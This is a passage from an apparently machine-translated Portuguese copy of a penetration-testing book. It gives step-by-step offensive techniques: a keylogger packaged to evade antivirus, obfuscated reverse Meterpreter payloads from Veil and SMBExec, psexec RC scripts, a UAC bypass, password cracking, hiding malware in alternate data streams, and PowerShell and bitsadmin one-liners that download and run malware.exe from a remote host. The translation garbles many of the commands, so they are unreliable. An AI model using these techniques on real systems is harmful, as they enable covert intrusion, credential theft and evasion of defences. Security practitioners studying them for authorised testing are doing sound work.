hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()
Aqui está o meu arquivo setup.py:
de distutils.core
configuração de importação
py2exe importação
setup (options = { 'py2exe': { 'bundle_files': 1, 'comprimido': True}},
janelas = [{ 'script': "logger.py"}],
zipfile = None,
)
E usando py2exe, vou converter o script python para um executável com os seguintes comandos:
python.exe setup.py install
python.exe setup.py py2exe
Agora vou ter um binário executável do keylogger que registra todas as teclas digitadas e lojas de todos os
toras chave para C: \ systemlog.txt. Muito simples e fácil e AV nunca foi detectado. Se você precisar, você
pode adicionar um pouco de aleatoriedade lá para se certificar de que não é captado por assinaturas ou de hash
correspondência.
Exemplo Veil (Kali Linux)
Veil é um gerador de carga útil para a ferramenta de Bypass Antivirus criado por Christopher Truncer. Esta ferramenta utiliza um
monte de diferentes métodos para fugir AV, mas é mais conhecido por usar tomar o shell Meterpreter,
convertendo­a em python, e envolvê­la em torno de py2exe / pyinstaller. Desta forma, o executável pode
ignorar uma série de ferramentas de lista branca e AV. Isso ocorre porque python é geralmente um branco aprovados constantes da lista
aplicação e pode ser facilmente codificada de modo que ele pode ignorar AV. Há uma grande quantidade de diferentes tipos de
maneiras de usar véu, mas eu vou passar por cima o mais geral.
Para criar um reverso ofuscado Meterpreter executável:
cd / opt / Veil
./Veil.py
Selecione a carga MeterHTTPSContained:
o usar 20
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 96/115
Tal como acontece com Metasploit, vamos precisar situado ao lado do LHOST e LPORT. Para este exemplo, meu atacante
sistema é 192.168.75.131 e LPORT será 443 (para olhar como SSL).
definir LHOST 192.168.75.131
definir LPORT 443
gerar
Figura 132 ­ Configuração Veil
Como eu disse antes, nós queremos envolvê nossa carga útil dentro de python para ajudar a evitar a detecção. Podemos concluir
isso configurando os seguintes comandos:
selecionando Pyinstaller
o 1
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 97/115
Figura 133 ­ Usando Python para compilar reverso HTTPS Meterpreter
O executável será localizado no / root / véu­output / compilou / pasta. Não deixe cair este arquivo em um
Virus Total Tipo de local como seria ser potencialmente alertando AV antes de seu noivado, mas você deve
validar com instâncias locais de AV para se certificar de que eles não provocam quaisquer assinaturas. Este método não tem
realmente me falhou e deve ser parte de seu arsenal.
SMBExec (Kali Linux)
SMBExec é uma ferramenta desenvolvida por brav0hax (https://github.com/brav0hax/smbexec), que contém um
grande quantidade de funcionalidade diferente. Neste livro, usamos a ferramenta para puxar hashes de um domínio
controlador, mas ele também pode ser usado para enumerar ações, validar logins, desabilitar o UAC, e também criar um
ofuscado executável Meterpreter. Brav0hax utiliza um número de diferentes técnicas de ofuscação,
incluindo randomização e compilá­lo em C nativo para ignorar AV (leia o código fonte do smbexec.
sh). Isto é o que vamos usar para criar o nosso shell reverso.
Para criar um reverso ofuscado Meterpreter executável:
cd / opt / smbexec
./smbexec.sh
Selecione Sistema de Acesso com o seguinte comando:
O 2
Selecione Criar um script executável e rc
O 2
Selecione Windows / meterpreter / reverse_https
O 2
Digite seu anfitrião e porta local
o 172.16.139.209
o 443
Uma vez SMBExec termina e você sair do aplicativo, uma nova pasta é criada no mesmo
diretório. Segue­se um nome de pasta timestamp similar. Dentro dessa pasta, você verá o backdoor.exe,
que é o seu inverso ofuscado https Meterpreter executável.
root @ kali: / opt / smbexec / 2013­12­23­1425­smbexec # ls ­alh
128K total de
drwxr­xr­x 2 raiz 4.0K raiz 29 de dezembro 18:28.
drwxr­xr­x 10 raiz 4.0K raiz 23 de dezembro 14:44 ..
­rwxr­xr­x 1 raiz 110K raiz 23 de dezembro 14:28 backdoor.exe
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 98/115
­­rw­R r­ raiz 1 raiz 283 23 de dezembro 14:28 metasetup.rc
­­rw­R r­ raiz 1 raiz 92 23 de dezembro 14:28 sha1­backdoor.hash
Na mesma pasta que você também verá o script metasetup.rc. scripts de RC será discutido um pouco mais tarde
o livro, mas se você der uma olhada no arquivo, você verá algo semelhante ao código abaixo:
spool / opt / smbexec / 2013­12­23­1425­smbexec / msfoutput­1425.txt
utilizar explorar / multi / manipulador
janelas conjunto de carga útil / Meterpreter / reverse_https
definir LHOST 172.16.139.209
definir LPORT 443
definir SessionCommunicationTimeout 600
definir ExitOnSession falsa
definir InitialAutoRunScript migrar ­f
explorar ­j ­z
Este é um script que configura e executa um manipulador de reverso para a carga automaticamente você apenas
gerada. Ele também adiciona comandos como configurar os tempos de espera e automigrating PIDs. Para executar o RC
script, ele pode ser feito pelo seguinte comando:
msfconsole ­r metasetup.rc
Isso deve lhe dar uma boa visão geral de onde você pode querer começar a se você está lutando anti­vírus.
A última coisa que queremos é que AV para impedi­lo de avançar para uma caixa que você pode ter um exploit.
Embora existam muitas técnicas diferentes para iludir AV e isso não é uma lista completa, mas dar­lhe
uma idéia de como você pode ir sobre o seu caminho.
Os testes de penetração é tudo sobre a experimentar diferentes ferramentas, técnicas e táticas para encontrar o que funciona em
que ambiente particular. Lembre­se não submeter o seu executável para um repositório como Virus Total,
como a vida útil do seu executável pode encolher dramaticamente.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 99/115
Esta seção é onde eu ter recolhido tudo o que auxilia no teste de penetração, mas não o fez
ter um lugar para outro lugar. Vou discutir algumas das dicas e truques que tenho para rachar os hashes de senha,
à procura de vulnerabilidades, e alguns atalhos que eu tenho.
Há tantas ferramentasdiferentes para usar com quebra de senha que eu vou focar principalmente em dois
ferramentas que eu uso. Essas duas ferramentas são John the Ripper (JTR) e oclHashcat. Estes são ambos excelentes
ferramentas para rachar senhas.
Antes que eu possa começar a falar sobre diferentes crackers de senhas, é importante ter a certeza que
compreender as definições básicas. As três configurações você geralmente deve fazer para um eficiente
processo de quebra de senha é definir listas de palavras, regras e algoritmos de hash.
Listas de palavras: Este é exatamente o que parece. Eles são arquivos que contêm listas de senhas em texto puro.
O software cracker senha vai tentar botar para cada uma destas senhas e ver se eles coincidir com o
hash que você está tentando rachar.
Eu geralmente gosto de tomar listas de palavras a partir de compromissos de senhas anteriores e incorporá­los com o
tipo de organização que você está lidando. Por exemplo, se você está rachando NTLM hashes de um
controlador de domínio, certifique­se de compreender o que a sua política de senha. Não há nenhum ponto de tentar 4
ou 5 letras senhas se eles exigem um mínimo de 8 caracteres.
Aqui estão algumas das minhas listas de palavras favoritas:
Nome de Lista: RockYou
Detalhes: compromisso a partir de 2009 de um jogo social e site de publicidade. Esta é uma grande lista para
começar com uma vez que não é muito grande e contém um monte de senhas comuns com uma taxa de sucesso decente.
Download Link: http://downloads.skullsecurity.org/passwords/rock­you.txt.bz2
Lista Nome: Crackstation­humana­only
Requisitos: senhas humano real vazou a partir de várias bases de dados do site. Há cerca de 64 milhões
senhas nesta lista.
Download Link: http://bit.ly/1cRS62E
Lista Nome: m3g9tr0n_Passwords_WordList_CLEANED 30 :
Detalhes: Lista de 122 milhões de senhas
Download Link: http://bit.ly/KrTcHF
Regras: Regras definir se nenhuma modificação precisa ser injetado na lista de palavras. A melhor maneira de descrever
regras é por um fácil de seguir o exemplo. Podemos tomar e usar o KoreLogicRulesAppendYears 31 conjunto de
regras, que se parecem com o seguinte:
Caz "19 [0­9] [0­9]"
Az "19 [0­9] [0­9]"
Caz "20 [01] [0­9]"
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 100/115
Az "20 [01] [0­9]"
Ele irá acrescentar os anos 1949­2019 para cada uma das senhas. Assim, se na lista de senhas
continham a palavra "hacker", que iria tentar quebrar o hash para a seqüência hacker1949 todo o caminho para
hacker2019. Lembre­se as regras mais complexas que você tem, mais tempo vai demorar para terminar através
todas as diferentes palavras da lista de palavras.
Algoritmos de hash: um algoritmo de hashing é utilizado para gerar o hash da senha. Estes são muito
importante porque se você selecionar o algoritmo errado, ou ele irá falhar ao executar ou deixar de crack. Para
exemplo, se escolher o algoritmo MD5 para hashes SHA1, as ferramentas de cracking não vai encontrar nenhum hashes
a rachar e vai sair imediatamente.
Agora que temos o entendimento básico de diferentes configurações de craqueamento, vamos comparar João
Ripper contra oclHashcat.
Eu costumava usar regularmente JTR, mas afastou­se um tempo atrás devido ao apoio GPU da oclHashcat, mas
JTR Jumbo tem suporte CUDA e OpenCL agora. Aqui está uma lista de formatos de hash JTR para ajudá­lo
identificar qual o tipo que você está rachando: http://pentestmonkey.net/cheat­sheet/john­the­ripper­hash­
formatos.
Cracking hashes MD5
Vamos dizer que você é capaz de comprometer um sistema * nix ou talvez um banco de dados completo de hashes de senha.
Você provavelmente vai correr em MD5 ou SHA, mas por exemplo a seguir, vamos supor que
eles são hashes MD5 não­salgados. Se você estiver olhando para quebrar hashes MD5 padrão, o comando básico
é:
john ­format = ­pot matéria­md5 =. / list.pot md5list.txt
Isto irá dizer John the Ripper para procurar no arquivo md5list.txt para hashes MD5 e escrever qualquer rachada
senhas para o list.pot arquivo.
root @ kali: ~ # john ­format = ­pot matéria­md5 = / md5list.txt list.pot.
Loaded 3 hashes de senha sem sais diferentes (Raw MD5 [128/128 SSE2])
teste TESTE)
senha (usuário)
woot (hackers)
adivinha: 3 tempo: 0: 00: 00: 01 CONCLUI (Sun 29 de dezembro 18:32:12 2013)
Se você estiver usando o pacote Jumbo JTR e quer tirar proveito do processamento GPU:
john ­format = matéria­md5­OpenCL ­wordlist = / Wordlists / all.lst ­rules:. md5list.txt Individual
Aqui são fontes adicionais sobre o uso JTR: http://blog.thireus.com/cracking­story­how­i­cracked­over­
122 milhões de sha1­and­md5­hash­passwords.
Honestamente, esta é a ferramenta que vou usar mais quando quebra de senha. Como todos sabemos, o processamento gráfico
unidade (GPU) são grandes para quebra de senha, como eles utilizam muitos núcleos diferentes em paralelo. o
vantagens da utilização de GPUs comparada CPUs são tão significativas e isso pode ser demonstrado com o uso de
oclHashcat.
Nos exemplos a seguir, eu vou passar por cima de craqueamento WPAv2 e NTLMv2. Estes são os mais
tipos de hash comuns que correm para dentro e realmente são a base para quaisquer outros tipos de hashes. Se você quiser
para ver todos os diferentes tipos de hash que oclHashcat apoiarão, visite o site
http://hashcat.net/oclhashcat/.
Cracking WPAv2
No início do livro, eu discuti como capturar o aperto de mão WPAv2 que seria necessário
para quebra de senha. A saída da captura foi um arquivo .hccap. Este é o formato de arquivo que
oclHashcat suporta a Bruto­forçando WPA hash senhas.
Nos exemplos a seguir, eu vou estar usando oclHashcat no meu host Windows usando uma GeForce
GTX 680. Embora eu prefiro usar os cartões ATI Radeon, mas em toda a realidade para o exemplo, não vai
fazer muita diferença. Para começar a quebra de senha, vou usar o comando:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 101/115
cudaHashcat­plus64.exe ­m 2500 lista out.hccap \ rockyou.txt
Figura 134 ­ Exemplo oclHashcat
Este é um exemplo muito simples, que diz para quebrar WPAv2 hashes contra o arquivo out.hccap
e usar a lista de senhas a partir rockyou.txt.
Cracking NTLMv2
Caso tenha comprometido um host Windows ou talvez um controlador de domínio, você vai ter que quebrar NTLM
hashes. Você pode sempre tentar contra os hashes LM, mas como isso está se tornando cada vez mais raro encontrar,
vamos ficar com o hash NTLM.
No exemplo a seguir, nós estamos tomando uma lista de hashes NTLM e usando a lista de senhas rockyou.
Figura 135 ­ NTLM oclHashcat
A partir do exemplo acima, havia 3 senhas únicas, mas oclHashcat só foi capaz de quebrar dois dos
as três palavras­passe. Para aumentar as nossas chances, eu estou indo para adicionar o conjunto de regras PasswordsPro para ajudar
com a lista de senhas rockyou. Se você deseja obter um pouco mais em compreender estas regras, tente
iniciando na página de oclHashcat: http://hashcat.net/wiki/doku.php?id=rule_based_attack.
Figura 136 ­ oclHashcat com as Regras
Usando as regras não chegou a encontrar a senha para o 3 rd hash. Em listas de hash de senha maiores, este
teria definitivamente encontrou mais senhas, mas só foi capaz de encontrar 2 dos 3 senhas desta
cenário. Para aumentar nossas chances ainda mais, Vou tentar ser uma lista de senhas muito maior. Isto,
Claro aumenta a quantidade de tempo necessário para executar este trabalho, mas se ele resolve uma senha, vai valer a pena
isto. Assim, o comando eu vou estar usando aqui é:
cudaHashcat­plus64.exe 1000 Lista NTLM.txt \ realhuman.txt ­r regras ­m \ passwordspro.rule
Figura 137 ­ oclHashcat com diferente lista de senha17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 102/115
Como você pode ver a partir dos resultados, a nova lista senha e regra definida recuperou a 3 rd senha. Apenas por
brincar com listas de senhas e conjuntos de regras diferentes, você pode descobrir rapidamente o que funciona eo
o que apenas leva muito tempo para ser executado. Isto, obviamente, é tudo baseado em quais tipos de GPUs você tem, quanto tempo
as listas de senhas é, e da complexidade do seu conjunto de regras.
Se você quer quebrar hashes MD5, MSSQL hashes, SHA1 hashes, ou outros, esta mesma consulta pode
ser administrado por alteração do parâmetro "­m". Para uma lista completa de hashes que oclHashcat aceita e rachaduras,
ir para https://hashcat.net/wiki/doku.php?id=example_hashes.
Cracking Smarter
Na maioria das vezes, vou usar oclHashcat com uma GPU 7990 para quebrar hashes usando uma grande lista de senhas e regras
conjunto. Isso é porque eu sou freqüentemente apenas à procura de senhas fracas como uma prova de conceito ou ao menos eu
precisa quebrar um par de senhas para entrar em uma conta OWA. Há outros momentos em que o cliente
pede especificamente para você para quebrar o maior número de hashes que puder.
Há duas apresentações que eu recomendo que você assista / pesquisa. A primeira é chamada
Cracking senhas Corporativos ­ explorar as fraquezas da Política de Senha ­ Minga / Rick Redman.
http://www.irongeek.com/i.php?page=videos/derbycon3/1301­cracking­corporate­passwords­
explorando­password­policy­fraquezas­minga­rick­Redman. Esta apresentação vai para o fato de que
GPUs ter chegado tão rápido que 8 senhas de caracteres podem ser ataque de força bruta em uma pequena quantidade de tempo.
Em seguida, ele mergulha no fato de que as senhas geralmente seguem um padrão com base na política de senha. E se
a política de senha afirma que sua senha deve ser um caractere especial e um número que
normalmente segue padrões semelhantes. Na maioria dos casos, você vai achar que as pessoas vão colocar o número no final
eo caráter especial no final, que será geralmente um ponto de exclamação. Se necessário um capital
carta, o mais provável que o personagem vai ser a primeira letra.
O PACK referências segunda apresentação (Password Análise e Cracking Toolkit), que é um
coleção de utilitários desenvolvidos para auxiliar a análise das listas de senhas e aumentando rachaduras
senhas usando a geração de regras inteligente. Isto é feito por um dos meus bons amigos e você pode ver o seu
apresentação aqui: https://thesprawl.org/media/research/passwords13­smarter­password­cracking­
com­pack.pdf e vídeo aqui: http://www.youtube.com/watch?v=8j6fOAH­Sko.
Ele também tem uma boa descrição e explicação passo a passo sobre como usar o seu instrumento e como você pode rachar
senhas de uma forma mais inteligente e mais eficiente, localizado em seu site:
https://thesprawl.org/projects/pack/.
Uma grande parte sobre ser um pentester é ser capaz de encontrar vulnerabilidades em aplicações e serviços.
A partir dos scans do Nmap, varreduras de vulnerabilidades e de picar ao redor, você vai identificar todos os tipos de
versões para estas aplicações e serviços.
Geralmente, eu vou tomar os resultados da banners Nmap eo scanner de vulnerabilidade e consultar o
versões identificadas de as candidaturas em função dos seguintes sites / ferramentas para encontrar exploits:
Searchsploit é uma ferramenta de consulta padrão que irá procurar através de exploits publicamente conhecidos com base em uma pesquisa
string que você fornecer. Você pode fornecer parte do título ou aplicação para encontrar um exploit. Há uma boa
número de exploits aqui ea maioria deles têm código ou scripts de pronto para ser executado. Uma coisa que eu quero
vivamente que é ter certeza de que você testá­los em um ambiente de laboratório antes de testá­los em
sistemas de produção.
Em seu anfitrião Kali, execute searchsploit.
Figura 138 ­ Searchsploit
Para este exemplo, vamos dizer que eu encontrei um site Joomla e eu quero ver se existem vulnerabilidades para
esta aplicação. Para consultar searchsploit, eu vou criar uma consulta como:
searchsploit joomla
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 103/115
Figura 139 ­ Resultados Searchsploit
Só a partir de uma consulta rápida para Joomla atualmente temos 906 vulnerabilidades diferentes. Vamos dar uma vista
em um deles para ter uma idéia do que parece. Uma coisa a notar é que os caminhos que estão no
resultados são pathed indevidamente. Todos os arquivos searchsploit estão localizados em / usr / share / exploitdb /. Visualizar
a vulnerabilidade ou código de exploração, digite o seguinte:
cat / usr / share / exploitdb / plataformas / php / webapps / 22153.pl
Figura 140­22.153 Perl Joomla Exploit Exemplo
O 22153.pl é um script Perl para executar uma injeção SQL contra uma determinada versão do Joomla. E se
bem sucedida, o script Perl voltará a senha do administrador.
Security Focus 'BugTraq é uma excelente fonte para encontrar vulnerabilidades e exploits. Você pode
vulnerabilidades de busca por CVEs ou por tipos de fornecedor / produto em: http://www.securityfocus.com/bid.
No exemplo abaixo, eu estava procurando algumas façanhas Adobe ColdFusion e parece que eu encontrei um
monte deles.
Figura 141 ­ BugTraq
http://www.exploit­db.com/
Eu realmente ver este local como a substituição de milw0rm o bom e velho, e este site cresceu com certeza.
Muitas pesquisas vão postar suas façanhas e pesquisas para Exploit­DB eo site é totalmente
pesquisável. Eu recomendo que você passar algum tempo na Exploit­DB, pois é um grande recurso.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 104/115
Figura 142 ­ Exploit­DB
Você não pode esquecer Metasploit como um excelente recurso para encontrar vulnerabilidades.
Em seu anfitrião Kali, em um tipo de terminal: msfconsole
E para encontrar um exploit ou módulo auxiliar, tipo: procurar [o que você quer encontrar]
No exemplo a seguir, eu procurar todos os módulos do ColdFusion.
Figura 143 ­ Busca Metasploit
Esta seção é dedicada a coisas que realmente não têm um lugar em qualquer lugar, mas pode ser capaz de fazer
o seu trabalho muito mais fácil.
Desde que eu tento incentivar a eficiência, alguns scripts que você deve olhar em são recursos do Metasploit
(RC) scripts. Esses scripts podem ser criados para ajudar a acelerar tarefas comuns que você pode executar. Por esta
exemplo, eu estou criando um script para usar o módulo PSExec, use smart_migrate para migrar o
processo Meterpreter em outro PID, e definir toda a fill­in outras informações necessárias para o ataque.
Vamos salvar o seguinte código para demo.rc
utilização explorar / windows / SMB / psexec
definir RHOST 192.168.10.10
conjunto administrador smbuser
definir ________________hash_____________ smbpass ou a senha
definir smbdomain ____domain_____
janelas conjunto de carga útil / meterpreter / reverse_tcp
definir AutoRunScript post / windows / gerenciar / smart_migrate
setg lport 443
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 105/115
setg lhost 192.168.10.3
Para executar o script, a partir de uma janela de comandos:
msfconsole ­r / root / demo.rc
Figura 144 ­ RC Scripts
Tudo que você tem que fazer depois que ele carrega é digitar: explorar. O que este script faz é que ele vai começar a se
Metasploit, autenticar­seusando 192.168.10.10 psexec, gotas e executa a carga Meterpreter,
e tem que caixa de ligar de volta para o seu anfitrião a ganhar uma concha cheia Meterpreter.
Esta é uma maneira muito mais rápida para preparar seus scripts, exploits e, especialmente, os manipuladores. Eu gosto de adicionar
recursos como auto­migrate ou para adicionar cargas personalizadas para exploits.
Há, por vezes, quando você pode ter uma conta administrativa e uma sessão de Meterpreter, mas
você não pode se tornar sistema usando o comando "getsystem". Isso é mais provável porque Usuário
Controle de Conta (UAC) de proteção está bloqueando você de executar o comando getsystem. Para obter
em torno desta, David Kennedy fez um grande trabalho em adicionar uma funcionalidade UAC desvio em
Metasploit. 32
No próximo exemplo, eu estou supondo que você já tem uma sessão Meterpreter e você é um local
administrador. Primeiro, você precisa digitar o comando:
bypassuac prazo
Isso fará com que uma outra sessão Meterpreter para executar. Neste caso, ele criou uma sessão 2. Vou enviar
a primeira sessão em segundo plano para que nós não perder essa sessão. Isto é feito com a
comando:
fundo
­i sessão 2
Agora, se você tentar o módulo getsystem, você vai se tornar sistema.
Figura 145 ­ Ignorando UAC
De vez em quando eu vou ver uma empresa ativamente usando um proxy web por todo o seu tráfego de Internet. Qualquer coisa
que não é categorizada será bloqueado e não consigo obter qualquer um dos meus escudos reversa para contornar
o filtro. Nesses casos raros, existem coisas que você pode fazer para ajudar a taxa de sucesso. para sósia
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 106/115
domínios que eu comprei especificamente para o teste, eu vou configurar um CNAME simples ou nome canônico em
esse domínio para apontar para o domínio original que eu doppelgangered. Vou deixar que sentar­se lá para poucos
dias ou semanas antes do ensaio. Por quê? Bem o site será automaticamente rastreado por uma série de
sistemas diferentes e quando os indexadores ver o CNAME configurado para o site real, eles vão assumir
que foi adquirida pela referida empresa e transformar esse domínio na mesma categoria de aprovado
domínios. Uma vez que seu teste começa, basta remover o CNAME e configurar o IP do malicioso real
servidor.
Esta é uma técnica antiga que tem sido em torno de sempre. Você tem um acesso shell a um host Windows, mas
não é um shell interativo. Como você pode obter os binários no host XP? Uma maneira de fazer isso é através da
Escrevendo os comandos de FTP para um arquivo e usando a opção ­s para ler os comandos do arquivo e
executá­lo. Esta é uma ótima maneira se você tiver apenas algo como um escudo web PHP e não pode baixar
arquivos. Eu costumava usar esse método para obter um executável Meterpreter no host e, em seguida, executá­lo para obter
acesso adicional no host.
cmd / C "echo aberta 192.168.100.100> ftp.txt"
cmd / C "echo hackers >> ftp.txt"
cmd / C "echo hackers >> ftp.txt"
cmd / C "echo bin >> ftp.txt"
cmd / C "echo get nc.exe >> ftp.txt"
cmd / C "echo bye >> ftp.txt"
cmd / C "ftp ­s: ftp.txt" 33
Se você precisa para ocultar arquivos, fluxos de dados alternativos (ADS) são sempre um bom caminho a percorrer. Os anúncios são realmente
tópico antigo, mas muda um pouco no Windows 7. Para explicar rapidamente ADS:
Sequência de dados alternativo (ADS) é o recurso menos conhecido do sistema de arquivos NTFS do Windows que
fornece a capacidade de colocar dados em arquivos e pastas existentes, sem afetar sua funcionalidade e
tamanho. 34
Isso significa que você pode esconder arquivos dentro de arquivos e não ser facilmente detectados usando o Windows Explorer
ou mesmo por listas do diretório padrão. O Windows 7 também introduziu algumas alterações que parou permitindo
ADS ataques. Nós temos que modificar o processo para permitir que esconder arquivos dentro de outros arquivos.
Vamos passar por como iríamos criar e esconder uma ADS.
Em primeiro lugar, teríamos que criar um arquivo fictício. Neste caso, vamos colocar as palavras "oi" para o
hi.txt documento.
o echo "oi"> hi.txt
Em seguida, vamos esconder nosso arquivo malware.exe no arquivo de texto que acabamos de criar.
o tipo C: \ Users \ Oficina \ Desktop \ malware.exe> ​​hi.txt: malware. exe
Se tentarmos ler o arquivo hi.txt, que acabamos de ler o conteúdo do arquivo, não o malware.
o tipo hi.txt
Mais uma vez, porque o Windows 7 fez alterações, comandos os anúncios normais não funcionam. Precisamos criado
um link simbólico para o arquivo. Este arquivo link simbólico será chamado malwareSymlink.exe. 35
o mklink malwareSymlink.exe C: \ Users \ Oficina \ Desktop \ hi.txt: malware.exe
Porque o link simbólico vai aparecer por toda a lista de diretório e dentro do Windows Explorer,
precisamos ativar o atributo oculto no arquivo. Isto irá removê­lo para a maioria das configurações de usuário normal.
o attrib + h / L malwareSymlink.exe
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 107/115
Se olharmos para uma listagem de diretório, malwareSymlink.exe não existe, mas se executar o simbólicoarquivo de link, o malware irá executar.
Figura 146 ­ ADS para Windows 7 e Superior
Há melhores maneiras de manter a persistência, mas ADS é apenas uma outra maneira de esconder em sistemas que possam
ser investigado activamente.
Mark Baggett mostrou um truque legal onde você pode ocultar ou bloquear arquivos usando o \\? \ Truque 36 . Está
melhor para ver um exemplo de como isso funciona e por isso pode ser útil.
Primeiro, crie uma pasta em C: \ tmp. Tentamos criar a pasta "..", que, por padrão do Windows
não permite.
o mkdir \\? \ c: \ tmp \ ".. \"
Em seguida passamos nosso arquivo de malware para o diretório.
o mover malware.exe "\\? \ c: \ tmp \ .." \
Se formos para o diretório tmp, podemos ver uma pasta "..". Se em uma linha de comando, nós tentamos ir para o
pasta .., porque o "cd .." comando significa ir para trás um diretório, não seremos capazes de entrar
esse diretório.
Nós sempre pode obter o nosso malwares fora desse diretório com o comando:
o copy "\\ c: \ tmp \ .. \ malware.exe".
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 108/115
Figura 147 ­ ocultar os arquivos
Figura 148 ­ ocultar os arquivos
Se tentarmos eliminar, modificar ou executar o arquivo executável a partir do Windows Explorer, que se negou devido à
localização do arquivo. Este é um ótimo lugar para se esconder arquivos, fluxos de dados alternados, e torná­lo difícil para
analistas para descobrir o que você está fazendo.
No Windows 7 e 8, a melhor maneira de obter os arquivos em um host está usando bitsadmin ou usando PowerShell. utilização
bitsadmin é grande porque ele é usado para atualizações do Windows e está usando as configurações de proxy do IE. Se o
organização tem um proxy web que requer credenciais AD, esta é uma maneira de contornar o problema.
PowerShell (verifique o Post Exploitation com a secção PowerSploit para mais detalhes)
cmd.exe / c "PowerShell (New­Object System.Net.WebClient).
DownloadFile ( 'http://www.securepla.net/ malware.exe ',' malware.exe '); (New­Object ­com
Shell.Application) .ShellExecute ( 'malware.exe') "
bitsadmin
cmd.exe / c "bitsadmin / transferência myjob / download / alta prioridade http://www.securepla.net/malware.exe
c: \ malware.exe & começar malware.exe "
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html109/115
O relatório final entregue ao cliente é realmente a única coisa que importa para o cliente. Fora de
tudo o que eu tenho discutido neste livro, o relatório é como você a penetração tester receber o pagamento e pediu
para voltar. Este é, de longe, o aspecto mais importante do seu teste. Você precisa ser capaz de explicar a
conclusões, avaliar as vulnerabilidades, e explicar como no mundo real os resultados são para o cliente.
Se você já teve vários testadores de penetração avaliar a sua rede, você verá que os relatórios
variar com base no que está realizando o teste. Você vai encontrar algumas empresas que re­modelo de uma vulnerabilidade
relatório de scanner e de outras empresas que você vai encontrar um relatório que é bem detalhado e fornece
etapas repetíveis. O que eu realmente encontrar o valor em falta é quando um relatório afirma que você tem 100
achados Apache / PHP que são críticos, mas os testadores não podem validar se eles são achados reais
com base na vulnerabilidade ou com base na versão banner.
Desde que o relatório é realmente uma adaptação de como você quer apresentar suas descobertas, não vou mostrar o meu
modelos, mas dar­lhe algumas dicas e as melhores práticas que eu aprendi a partir de muitos anos de testes.
Quando eu usei para ensinar, gostaria de salientar relatórios como o fator mais importante para uma bem­sucedida
teste de penetração. Não importa se você já bateu 3 ou 300 caixas, se você não contar a
cliente exatamente o que você fez ou se você não ajudar o cliente a compreender as atenuações para resolver
as questões.
Se você quiser ver o que um exemplo de relatório deve ser semelhante, você pode olhar para a Segurança Ofensivo
amostra relatório. 37 http://www.offensive­security.com/reports/penetration­testing­sample­report­
2013.pdf
Não apresentar um relatório Nexpose ou Nessus que foi re­intitulado
o que eu não posso forçar este bastante; usar seu próprio modelo e validar suas descobertas.
o Não sempre dar a seus clientes um relatório Nexpose ou Nessus como o relatório final.
Avaliação suas vulnerabilidades
o Certifique­se de descobrir uma maneira para avaliar consistentemente suas vulnerabilidades.
o que eu construí minha própria matriz que inclui referências de NIST, DISA, CVSS, e pessoal
experiência para definir classificação a vulnerabilidades.
o A matriz inclui aumentando ou diminuindo a severidade com base em conclusões internas / externas, se
código de exploração está disponível, como difundido seus sistemas são, o que exploits pode levar a, e
como isso afeta o triângulo de segurança CIA.
o As vulnerabilidades que passam pela minha matriz terá sempre o mesmo nível de criticidade. Se um
cliente pergunta como eu marquei uma classificação para uma vulnerabilidade, que pode fazer referência a minha matriz.
Teórica vs. Os resultados reais
o que eu geralmente não gostam de marcação descobertas como crítica se eles são apenas teóricos e nenhum real
exploit está disponível ou conhecido. Estes devem ainda ser definitivamente resultados, mas eu vou geral
diminuir a classificação se eu não consigo encontrar nenhuma avenida para explorar o host.
o Isso dá a ajuda do cliente identificar corretamente quais as conclusões precisam de atenção imediata contra
aqueles que podem ser aplicadas durante uma janela de controle de mudanças regular.
As soluções são tão importantes quanto os resultados
